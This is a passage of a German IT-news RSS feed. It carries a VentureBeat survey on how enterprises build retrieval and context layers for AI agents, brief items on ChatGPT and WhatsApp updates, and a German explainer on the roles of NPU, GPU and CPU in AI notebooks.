    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI context gap: Enterprise AI organizations have a trust problem, not a retrieval problem — and most are still building the fix]]></title>
<description><![CDATA[Across 101 enterprises, the infrastructure that feeds AI agents their business context is being built faster than it can be trusted. Retrieval-augmented generation is already the default context source, and provider-native retrieval has quietly overtaken the dedicated vector databases that define...]]></description>
<link>https://tsecurity.de/de/3674340/it-nachrichten/the-ai-context-gap-enterprise-ai-organizations-have-a-trust-problem-not-a-retrieval-problem-and-most-are-still-building-the-fix/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674340/it-nachrichten/the-ai-context-gap-enterprise-ai-organizations-have-a-trust-problem-not-a-retrieval-problem-and-most-are-still-building-the-fix/</guid>
<pubDate>Thu, 16 Jul 2026 20:02:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 101 enterprises, the infrastructure that feeds AI agents their business context is being built faster than it can be trusted. Retrieval-augmented generation is already the default context source, and provider-native retrieval has quietly overtaken the dedicated vector databases that define the category — yet a majority of enterprises have already watched their agents produce confident, wrong answers traced to missing or inconsistent context. A governed semantic layer is emerging as the fix, but most are still building it; the field is converging on hybrid retrieval; and even as provider-native tools lead in practice, a plurality say they intend to keep best-of-breed. The result is a context gap — agents that sound authoritative running on a foundation their owners do not yet fully trust.</p><p>This wave of VentureBeat Pulse Research examines the enterprise RAG and context layer: what feeds AI agents their business context, which retrieval systems enterprises run, how they buy and measure them, where the architecture is heading, and — most revealingly — how often that context is already failing them.</p><p>The central finding is a context gap — the distance between how confidently enterprise agents answer and how reliable the context beneath them actually is. A majority of enterprises (57%) report that in the past six months their AI agents produced confident but wrong answers they traced to missing or inconsistent business context, and more than half of those said it happened more than once. This is not a fringe failure: retrieval is the primary context source for 38% of enterprises, more than any other approach, so when retrieval is thin or inconsistent, the errors it produces are wearing the agent’s authority. The infrastructure to fix it is being built — 58% already run or are building a governed semantic layer — but for most it is not yet in production.</p><p>Underneath, the market is consolidating in a direction that surprises. Provider-native retrieval — OpenAI’s file search (40%) and Google’s Vertex AI Search (38%) — already leads every dedicated vector database, and enterprises expect hybrid retrieval to dominate by the end of 2026 (34%). Yet a plurality (36%) say they intend to keep best-of-breed standalone tools rather than consolidate onto a provider’s native context stack, and a majority (57%) plan to switch or add a provider within the year. Stated preference and actual usage are pulling in opposite directions — the market is buying provider-native while insisting it wants independence.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series. This survey focused on enterprise RAG infrastructure and the context layer — the retrieval systems, semantic layers, and context sources that feed AI agents. Responses are filtered to organizations with more than 100 employees (n=101); the survey drew no responses from organizations of 100 or fewer, so the full sample qualifies. All responses are from a single Q2 2026 (June) wave, so the report reads cross-sectionally and does not infer month-over-month trends. Several questions were multiple-select, so those shares can sum to more than 100%.</p><p>By organization size the sample concentrates in the mid-market: 251–1,000 employees (31%) and 101–250 (31%) lead, with 1,001–5,000 (20%), 5,001–10,000 (12%), and 10,001+ (7%) above them. By role it spans managers (39%), individual contributors (27%), the C-suite (16%), and VPs and directors (14%); on purchasing authority it is buyer-credible, with 46% final decision-makers and another 26% recommenders or influencers. Technology/Software is the largest industry at 20%, followed by Healthcare/Life Sciences (11%) and a broad spread across retail, transportation, financial services, manufacturing, and education.</p><p>At 101 respondents this is a modest sample and should be read as a directional signal rather than a precise measurement; it is self-selected and is not a probability sample. It is best read as the view from organizations actively standing up RAG and context infrastructure rather than from the largest operators.</p><h2>Finding 1: Confident and wrong</h2><p><b>More than half have traced agent errors to bad context</b></p><p>We asked whether, in the past six months, enterprises had traced a confident but wrong agent answer to missing or inconsistent business context. Most had.</p><div></div><p>This is the report’s defining number. A majority of enterprises (57%) have already had an AI agent produce a confident, wrong answer they traced to bad context — wrong metrics, stale definitions, or missing documents — and more than half of those have seen it happen more than once. Only 28% report no such failure, and a small remainder either don’t run agents on enterprise data or don’t trace root cause closely enough to know. </p><p>The failure mode is specific and dangerous: the model is not obviously hallucinating; it is confidently wrong because the context feeding it was thin or inconsistent. Everything else in this report — what enterprises retrieve, how they govern it, and what they plan to build — is downstream of this problem.</p><h2>Finding 2: RAG is the default context source</h2><p><b>Retrieval feeds more agents than any other method</b></p><p>We asked what an enterprise’s AI agents primarily use to understand its data. Retrieval leads by a wide margin.</p><div></div><p>Retrieval is the backbone of enterprise context. For 38% of organizations, RAG over documents or a vector index is the primary way agents understand the business — nearly twice the share of the next approach, a governed semantic layer or ontology (21%). Mixed approaches (14%), direct live-system queries (10%), and long-context loading (6%) fill out the rest, and only 2% let agents run on the model’s general knowledge alone. The concentration matters in light of Finding 1: because so much enterprise context flows through retrieval, the quality of that retrieval is the quality of the answer. When RAG is the default source, thin retrieval is not an edge case — it is the main failure surface.</p><p>One approach is notable for its absence from these answers: customizing model weights, also known as fine-tuning. Every leading source of business context is injected at run time. Our most recent direct measurement of fine-tuning comes from our April–May survey wave (a separate survey, n=136), where fine-tuning capabilities ranked last of six factors in model selection at 5% — even as 26% of that sample still named fine-tuning and customization an investment they expect to grow. Fine-tuning has fallen out of the primary selection conversation; context injection is how enterprises make agents knowledgeable about their business.</p><h2>Finding 3: Provider-native retrieval already leads the vector databases</h2><p><b>OpenAI file search and vertex AI search top the dedicated tools</b></p><p>We asked which retrieval systems enterprises run in production today. The answer favors the model providers and hyperscalers over the specialists.</p><div></div><p>The dedicated vector database is no longer the center of the RAG stack. OpenAI’s file search (40%) and Google’s Vertex AI Search (38%) lead — provider-native and hyperscaler-native retrieval — ahead of every purpose-built vector database. Among the specialists, the most-used is the one enterprises already run for other reasons (Elasticsearch/OpenSearch, 20%) and the open, embedded option (pgvector, 12%); the pure-play vector databases that define the category — Weaviate, Qdrant, Pinecone, Milvus — each sit in single digits to low double digits. Notably, 13% of enterprises say they still run no production RAG at all. As with the platforms in the parallel infrastructure wave, enterprises are gravitating to retrieval that comes bundled with tools they already buy.</p><p>The shape of this finding held across both Q2 waves. In April–May (n=161), provider-built retrieval led usage there too, while every dedicated vector database remained marginal — the most-used standalone vector database peaked at 8% of that sample — and the hybrid, pluralistic future was already the consensus expectation (34% expected hybrid retrieval to dominate, with another 29% expecting multiple architectures by use case). Two waves, consistent picture: the category that coined the “vector database” term is being collected by the platforms enterprises already buy from.</p><h2>Finding 4: But they say they want to keep best-of-breed</h2><p><b>A plurality resist consolidating onto a provider’s native stack</b></p><p>We asked how enterprises will respond as model providers bundle retrieval, memory, and orchestration into their platforms. Their stated intent cuts against their current usage.</p><div></div><p>Here is the tension at the heart of the stack. Even as provider-native retrieval leads in practice (Finding 3), a plurality of enterprises (36%) say they intend to keep best-of-breed standalone tools rather than consolidate onto a provider’s native context stack — well ahead of the 21% who plan to consolidate. Another 21% expect a mix, and 9% intend to build and own the layer themselves. The gap between what enterprises run and what they say they want is the strategic question of the category: they are adopting bundled retrieval for convenience while asserting they will preserve independence. Which impulse wins — the pull of the provider bundle or the stated preference for modular control — will shape the retrieval market more than any single tool.</p><h2>Finding 5: Hybrid retrieval is the consensus bet</h2><p><b>Vector-only retrieval is already seen as insufficient</b></p><p>We asked which retrieval architecture enterprises expect to dominate their production RAG systems by the end of 2026. The field is converging — with a large share still unsure.</p><div></div><p>The architecture is settling on hybrid. A third (34%) expect hybrid retrieval — embeddings combined with reranking and access controls — to dominate their production systems by the end of 2026, three times the 11% who expect vector-only retrieval to prevail. That is a notable signal: the pure vector-search approach that launched the category is already viewed as insufficient on its own, superseded by pipelines that add reranking for accuracy and access controls for governance — the very access controls whose absence produces the failures in Finding 1. Tellingly, the second-largest answer is uncertainty: 17% simply don’t know, and another 14% expect to move beyond a dedicated vector layer entirely toward tool-first or long-context retrieval. The consensus is not a single tool but a layered pipeline — and it is not yet fully formed.</p><h2>Finding 6: The governed context layer is being built now</h2><p><b>Most run or are building a semantic layer — few in production</b></p><p>We asked whether enterprises use a governed semantic or context layer to give agents and BI a shared understanding of their data. Most are on the path; fewer have arrived.</p><div></div><p>The fix for the context gap is under construction. Well over half of enterprises (58%) either run a governed semantic layer in production (25%) or are piloting and building one (34%), and a further 17% are actively evaluating — meaning three-quarters are engaged with the idea in some form. But the balance is telling: more are building than have shipped, so for most enterprises the shared, governed definition layer that would prevent the "confident but wrong" failures of Finding 1 is still a work in progress. The semantic layer is the industry’s answer to inconsistent context; this wave catches it mid-construction, ambition well ahead of production.</p><h2>Finding 7: Bought on ingestion and simplicity, watched for correctness</h2><p><b>Selection favors operability; monitoring favors correctness and security</b></p><p>We asked what matters most when enterprises choose a retrieval system, and what they track once it is running. Both answers lean practical.</p><div></div><p>Enterprises choose retrieval systems on operability. Ease of data ingestion (36%), latency and performance (32%), and operational simplicity (29%) lead the selection criteria — ahead of retrieval accuracy and access control (23% each), the two factors most directly tied to the failures in Finding 1. Once systems are running, the emphasis shifts toward trust: the most-tracked metrics are response correctness (42%) and security and access control (38%), ahead of latency (28%), operational stability (27%), and answer relevance (23%). </p><p>Satisfaction with current systems is moderately positive but not enthusiastic — on a five-point scale, overall satisfaction averages 4.0, with ease of implementation and value for money both near 3.9. Enterprises buy for how easily a system runs and watch it for whether it can be trusted.</p><h2>Finding 8: A retrieval reshuffle is coming</h2><p><b>A majority plan to change providers — and the vector specialists are gaining interest</b></p><p>We asked whether enterprises plan to change or add a retrieval provider, and which they are considering. The consideration set differs from today’s stack.</p><div></div><p>The retrieval stack is not settled. While 43% have no plans to change, a small majority (57%) intend to switch or add a provider within twelve months, and a quarter (26%) within the next quarter. The consideration set is where it gets interesting: provider-native retrieval still leads what enterprises are evaluating (OpenAI 22%, Vertex AI Search 21%), but the open-source vector specialists punch above their current footprint — Qdrant (14%) and Milvus (13%) draw more switching interest than their present usage (10% and 6%) would suggest. Read with Finding 4, the picture is a market in flux: enterprises run provider-native today, are evaluating a broader field, and say they want to keep their options open. The reshuffle ahead will test whether best-of-breed intent survives contact with the convenience of the bundle.</p><h1>The bottom line: A context gap that more retrieval alone won’t close</h1><p>Organizations with more than 100 employees are wiring agents into their business faster than they can guarantee the context those agents run on. Retrieval is the default source of enterprise context, and it increasingly comes from the model providers and hyperscalers rather than the dedicated vector databases — yet a majority of enterprises have already watched agents answer confidently and wrongly because that context was thin or inconsistent. The failure is not exotic; it is the predictable result of pointing authoritative-sounding agents at an unreliable foundation.</p><p>The industry’s answer — a governed semantic layer, hybrid retrieval with reranking and access controls — is being built but is mostly not yet in production, and enterprises are pulled between the convenience of provider-native bundles and a stated preference for best-of-breed independence. At 101 respondents in a single Q2 wave this is a directional read, skewed toward the mid-market — but the direction is clear: the context layer is the next contested tier of the AI stack, and right now agents are running ahead of it. The context gap is not a retrieval-volume problem that more documents or bigger indexes will solve on their own; it is a problem of governed, consistent, access-aware context. The open question for later waves is whether enterprises finish building that layer before the confident-but-wrong failures move from the lab into decisions that matter.</p><hr><p><i>Based on survey responses from 101 qualified enterprise respondents (100+ employees), drawn from a single Q2 2026 (June) wave. At this sample size the results should be read as a directional signal rather than a precise measurement — it's a self-selected sample, not a probability sample, and skews toward the mid-market. Respondents include managers, individual contributors, VPs/directors, and the C-suite, with strong purchasing authority, across technology, healthcare, retail, transportation, financial services, manufacturing, and education.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Verbesserung: ChatGPT erhält höheres Zeichenlimit und erweiterte Suche]]></title>
<description><![CDATA[OpenAI hat die Zeichenlimits für benutzerdefinierte Anweisungen in ChatGPT für ausgewählte kostenpflichtige Tarife deutlich angehoben. Gleichzeitig erhält die interne Suche neue Funktionen und Filter, mit denen sich Chats, Dokumente, Bilder und Projekte gezielter durchsuchen lassen.]]></description>
<link>https://tsecurity.de/de/3674284/it-nachrichten/verbesserung-chatgpt-erhaelt-hoeheres-zeichenlimit-und-erweiterte-suche/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674284/it-nachrichten/verbesserung-chatgpt-erhaelt-hoeheres-zeichenlimit-und-erweiterte-suche/</guid>
<pubDate>Thu, 16 Jul 2026 19:31:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://pics.computerbase.de/1/2/3/8/1/9-43debe5cac994e89/article-640x360.f43ff043.jpg"><p>OpenAI hat die Zeichenlimits für benutzerdefinierte Anweisungen in ChatGPT für ausgewählte kostenpflichtige Tarife deutlich angehoben. Gleichzeitig erhält die interne Suche neue Funktionen und Filter, mit denen sich Chats, Dokumente, Bilder und Projekte gezielter durchsuchen lassen.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp: Das passiert jetzt bei einigen Nutzern, wenn sie eine Nachricht versenden]]></title>
<description><![CDATA[Hast du eine Veränderung in deinen WhatsApp-Chats wahrgenommen? Dann geht es dir damit nicht alleine so. Was es damit auf sich hat und wie du diese Einstellung abstellen kannst, erfährst du hier.]]></description>
<link>https://tsecurity.de/de/3673757/it-nachrichten/whatsapp-das-passiert-jetzt-bei-einigen-nutzern-wenn-sie-eine-nachricht-versenden/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673757/it-nachrichten/whatsapp-das-passiert-jetzt-bei-einigen-nutzern-wenn-sie-eine-nachricht-versenden/</guid>
<pubDate>Thu, 16 Jul 2026 16:17:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Hast du eine Veränderung in deinen WhatsApp-Chats wahrgenommen? Dann geht es dir damit nicht alleine so. Was es damit auf sich hat und wie du diese Einstellung abstellen kannst, erfährst du hier.]]></content:encoded>
</item>
<item>
<title><![CDATA[NPU, GPU, CPU – wer macht im KI-Notebook eigentlich was?]]></title>
<description><![CDATA[Seit einiger Zeit verkaufen die Hersteller Notebooks als KI-PC oder Copilot+ PC. Der Zusatz steht für einen Umbau der inneren Technik. Neben dem Hauptprozessor (CPU) und der Grafikeinheit (GPU) sitzt jetzt ein dritter Baustein auf dem Chip, die neuronale Recheneinheit (Neural Processing Unit, NPU...]]></description>
<link>https://tsecurity.de/de/3673622/it-nachrichten/npu-gpu-cpu-wer-macht-im-ki-notebook-eigentlich-was/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673622/it-nachrichten/npu-gpu-cpu-wer-macht-im-ki-notebook-eigentlich-was/</guid>
<pubDate>Thu, 16 Jul 2026 15:33:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Seit einiger Zeit verkaufen die Hersteller Notebooks als <a href="https://www.pcwelt.de/article/2819676/copilot-pc-lohnt-sich-der-kauf-eines-ki-rechners-das-mussen-sie-wissen.html" target="_blank" rel="noreferrer noopener">KI-PC oder Copilot+ PC. </a>Der Zusatz steht für einen Umbau der inneren Technik. Neben dem Hauptprozessor (CPU) und der Grafikeinheit (GPU) sitzt jetzt ein dritter Baustein auf dem Chip, <a href="https://www.pcwelt.de/article/2465723/was-ist-eine-neural-processing-unit-npu.html" target="_blank" rel="noreferrer noopener">die neuronale Recheneinheit (Neural Processing Unit, NPU).</a> Die NPU berechnet KI-Funktionen energieeffizient direkt auf dem Gerät. Wer ein KI-Notebook kaufen möchte, sollte auf die entscheidende Leistungskennzahl achten.</p>



<p>Für das Siegel Copilot+ verlangt Microsoft <a href="https://www.microsoft.com/en-us/windows/learning-center/copilot-plus-pcs-windows-pcs-differences" target="_blank" rel="noreferrer noopener">eine NPU mit mindestens 40 TOPS, dazu 16 GByte Arbeitsspeicher und 256 GByte SSD</a>. Aktuelle Notebook-Chips erreichen das mühelos, so kommt Intels Core Ultra Series 3 auf 50 TOPS allein für die NPU. </p>



<p>AMD (<a href="https://www.pcwelt.de/article/2477679/hp-omnibook-ultra-14-test.html" target="_blank" rel="noreferrer noopener">Ryzen AI 300</a> und 400), Qualcomm (<a href="https://www.pcwelt.de/article/3123457/qualcomm-snapdragon-x2-elite-streaming-test.html" target="_blank" rel="noreferrer noopener">Snapdragon X2</a>) und Apple (M-Serie mit Neural Engine) liefern NPUs in ähnlicher Größenordnung. Erst die Rollenverteilung zwischen den drei Rechenwerken sorgt für flüssige KI-Funktionen im täglichen Gebrauch.</p>



<h2 class="wp-block-heading toc"><strong>Die CPU steuert und verteilt</strong></h2>



<p>Die CPU steuert alle Vorgänge im Notebook. Sie startet Programme, verwaltet den Arbeitsspeicher und hält das Betriebssystem aktiv. Ihre wenigen, dafür kräftigen Kerne arbeiten Befehle nacheinander ab und eignen sich für verzweigte Aufgaben mit vielen Entscheidungen.</p>



<p>Bei KI-Funktionen übernimmt die CPU die Rolle des Verteilers. Sie erkennt, welche Art von Aufgabe ansteht, und schickt sie an das passende Rechenwerk. Eine Echtzeitaufgabe geht zur NPU, eine schwere Rechenlast zur GPU, eine reine Systemaufgabe bleibt bei der CPU selbst. </p>



<p>Sobald das Ergebnis vorliegt, fügt die CPU es an der richtigen Stelle ein, zum Beispiel den unscharfen Hintergrund in dein Videobild.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58dd60ec1cf"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/AMD-X3D_RGBeci.jpg?quality=50&amp;strip=all&amp;w=1200" alt="AMDs Ryzen-Prozessor" class="wp-image-2938527" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>AMDs Ryzen-Prozessoren mit 3D V-Cache setzen auf gestapelten L3-Cache für mehr FPS (Frames per Second – Bilder pro Sekunde) bei speicherintensiven Spielen.</p>
</figcaption></figure><p class="imageCredit">AMD</p></div>



<h2 class="wp-block-heading toc"><strong>Die GPU rechnet massiv parallel</strong></h2>



<p>Die GPU (<a href="https://www.pcwelt.de/article/3127541/beste-grafikkarten-fuer-gamer.html" target="_blank" rel="noreferrer noopener">Diese Grafikkarten sind ihr Geld wert</a>) rechnet mit Hunderten bis Tausenden kleiner Kerne, die gleiche Rechenschritte gleichzeitig ausführen. Die Bauweise kommt aus der Grafikdarstellung und taugt genauso für KI. Beim Spielen, bei der Videobearbeitung und beim 3D-Rendering liefert die GPU die Rechenleistung, ebenso beim Training großer KI-Modelle und bei schweren parallelen Rechenlasten.</p>



<p>Im Notebook steckt die GPU in zwei Formen. Eine integrierte Grafikeinheit sitzt zusammen mit CPU und NPU auf einem Chip, zum Beispiel Intel Arc oder AMD Radeon. Eine dedizierte Grafikkarte wie eine NVIDIA GeForce RTX bringt eigenen Videospeicher (VRAM) mit und schafft mehr Leistung, zieht dafür mehr Strom und erzeugt mehr Wärme.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58dd60eceed"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/image_8a8156.png?w=1200" alt="XFX Radeon RX 7600 GPU" class="wp-image-3173838" width="1200" height="635" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">XFX</p></div>



<h2 class="wp-block-heading toc"><strong>Die NPU spart Strom bei KI</strong></h2>



<p>Die NPU ist auf eine einzige Sorte Mathematik ausgelegt, die hinter neuronalen Netzen steckt. Es geht um Matrixrechnungen, also viele Multiplikationen und Additionen auf einmal. Genau dafür nutzt die NPU spezielle Recheneinheiten (MAC) und schnellen Speicher direkt auf dem Chip, damit die Daten kurze Wege haben.</p>



<p>Der große Vorteil ist der niedrige Stromverbrauch. Eine NPU zieht für KI-Aufgaben nur wenige Watt, eine Grafikkarte im Rechenzentrum kommt unter voller Trainingslast auf mehrere Hundert Watt. </p>



<p>Die NPU rechnet zudem häufig mit vereinfachter Genauigkeit (INT8 statt der feineren Formate einer GPU). Das spart Energie und beschleunigt die Antwort, reicht für KI-Inferenz aber völlig aus.</p>



<p>KI-Inferenz meint das Ausführen eines fertig trainierten Modells, also das Anwenden. Das Anlernen des Modells bleibt Sache der GPU. Für Grafik, Spiele oder allgemeine Programme taugt die NPU nicht. Ihre Stärke liegt allein bei KI, die dauerhaft und im Hintergrund aktiv ist.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58dd60edc79"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/NPU.png" alt="Die NPU berechnet KI-Funktionen energieeffizient direkt auf dem Gerät. Wer ein KI-Notebook kaufen möchte, sollte auf die entscheidende Leistungskennzahl achten." class="wp-image-2879145" width="955" height="724" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Sam Singleton</p></div>



<h2 class="wp-block-heading toc"><strong>Was TOPS wirklich aussagen</strong></h2>



<p>TOPS steht für Tera Operations Per Second, also Billionen Rechenoperationen pro Sekunde. Eine NPU mit 50 TOPS schafft 50 Billionen Rechenoperationen in einer Sekunde. Je höher der Wert, desto mehr KI-Rechenschritte passen in dieselbe Zeit.</p>



<p>Ein Vergleich der TOPS allein ist wenig aussagekräftig. Die NPU rechnet mit vereinfachter Genauigkeit und meldet andere Werte als eine GPU, deren TOPS Grafik und KI zusammenfassen. Desktop-Grafikkarten kommen so auf über 1.000 TOPS, ihre NPU-Kollegen im Notebook auf 40 bis 80. Beide Zahlen messen nicht dasselbe.</p>



<p>Für den Kauf zählt eine Angabe. Wirbt ein Hersteller mit einer hohen Gesamtzahl aus CPU, GPU und NPU, sagt das wenig über das Copilot+ Siegel. Microsoft verlangt die 40 TOPS allein von der NPU. Ein prüfender Blick auf den NPU-Wert im Datenblatt schützt vor Enttäuschung.</p>



<h2 class="wp-block-heading toc"><strong>Warum lokale KI Ihnen nützt</strong></h2>



<p>KI direkt auf dem Notebook (<a href="https://www.pcwelt.de/article/3023026/lokale-ki-sieben-ki-tools-die-sie-auf-ihrem-pc-nutzen-koennen.html" target="_blank" rel="noreferrer noopener">Was kann KI lokal auf dem PC? 7 Anwendungsmöglichkeiten</a>) bringt mehrere handfeste Vorteile gegenüber der Cloud:</p>



<ul class="wp-block-list">
<li>Datenschutz: Fotos, Dokumente und Sprachaufnahmen bleiben auf dem Gerät und gelangen nicht auf fremde Server.</li>



<li>Tempo: Die Antwort kommt ohne Umweg über das Internet, oft in Echtzeit.</li>



<li>Offline-Betrieb: Funktionen wie Übersetzung oder Rauschunterdrückung arbeiten auch ohne Verbindung.</li>



<li>Akku: Die sparsame NPU hält KI-Funktionen aktiv, ohne den Akku schnell zu leeren.</li>
</ul>



<p>Eine Grenze gehört dazu. Cloud-Dienste wie ChatGPT oder Google Gemini rechnen auf externen Servern. Eine NPU beschleunigt sie nicht, denn die Arbeit passiert gar nicht auf deinem Gerät. Der NPU-Vorteil greift bei lokalen Funktionen, zum Beispiel den KI-Effekten in Videocalls oder einem Sprachmodell, das direkt auf dem Notebook antwortet.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58dd60ef07f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/Windows-11-laptop-with-Copilot-background-faster-easier-smarter.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Windows 11 laptop with Copilot background faster easier smarter" class="wp-image-3111852" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Microsoft</p></div>



<h2 class="wp-block-heading toc"><strong>NPU-Funktionen unter Windows</strong></h2>



<p>Windows verteilt passende Aufgaben von sich aus an die NPU. In Videocalls sorgen die Windows Studio Effects für Hintergrundunschärfe, korrigierten Blickkontakt und eine ruhigere Tonspur. Live Captions übersetzen gesprochene Sprache in Untertitel, die Funktion Cocreator erzeugt Bilder aus einer Textbeschreibung, und Recall macht frühere Bildschirminhalte durchsuchbar.</p>



<p>Auch außerhalb von Windows nutzen Programme die NPU. Foto- und Videobearbeitung entfernt Objekte, tauscht Hintergründe oder rechnet Bilder hoch. Kleine Sprachmodelle antworten direkt auf dem Notebook, ohne Daten nach außen zu geben. Ob die NPU gerade arbeitet, zeigt der Windows-Task-Manager im Bereich “Leistung”.</p>



<h2 class="wp-block-heading toc"><strong>NPU, TPU und der Blick über das Notebook</strong></h2>



<p>NPUs stecken nicht nur in Notebooks. Smartphones enthalten sie seit Jahren, Apple brachte mit dem iPhone X eine frühe Variante, Huawei kurz darauf eine eigene. Im Rechenzentrum gibt es eine verwandte Sonderform, die TPU (Tensor Processing Unit) von Google. Sie ist auf das KI-Framework TensorFlow zugeschnitten und beschleunigt KI-Dienste in der Cloud.</p>



<h2 class="wp-block-heading toc"><strong>Kaufhinweise für Ihr KI-Notebook</strong></h2>



<p>Die drei Rechenwerke ergänzen sich. Die CPU steuert und verteilt, die GPU liefert rohe Parallelleistung für Grafik und Modelltraining, die NPU erledigt dauerhafte KI-Aufgaben energiesparend. Für ein neues KI-Notebook lohnt der Blick auf den NPU-Wert. </p>



<p>40 TOPS öffnen die Copilot+ Funktionen von Windows, mehr Reserve mit 50 bis 80 TOPS aktueller Chips hält länger für kommende KI-Features vor. Dazu gehören 16 GByte Arbeitsspeicher als sinnvolle Untergrenze. Damit bist du für die KI-Funktionen der nächsten Jahre gut aufgestellt.</p>

</div>]]></content:encoded>
</item>
<item>
